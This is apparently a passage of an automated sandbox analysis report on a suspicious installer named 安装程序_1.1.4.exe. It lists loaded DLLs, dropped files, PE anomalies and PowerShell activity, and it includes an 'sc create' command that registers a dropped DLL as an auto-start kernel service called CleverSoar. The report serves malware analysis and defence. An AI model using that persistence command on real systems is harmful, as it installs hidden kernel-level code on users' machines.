Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic file information: File size 7237925 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1798230293.0000000003090000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1798079649.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D257D0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x34384b
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x34384b
Source: update.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: update.vbc.1.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: real checksum: 0x0 should be: 0x6ea786
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vbc.1.drStatic PE information: section name: .00cfg
Source: update.vbc.1.drStatic PE information: section name: .voltbl
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vbc.6.drStatic PE information: section name: .00cfg
Source: update.vbc.6.drStatic PE information: section name: .voltbl
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0FBDDB push ecx; ret 6_2_6C0FBDEE
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6BFA0F00 push ss; retn 0001h6_2_6BFA0F0A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1C9F10 push eax; ret 6_2_6C1C9F2E
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C12E9F4 push 004AC35Ch; ret 6_2_6C12EA0E
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C1CA290 push eax; ret 6_2_6C1CA2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA45F4 push 00D4C35Ch; ret 10_2_00CA460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3FB10 push eax; ret 10_2_00D3FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3FE90 push eax; ret 10_2_00D3FEBE
Source: update.vbc.1.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbcJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
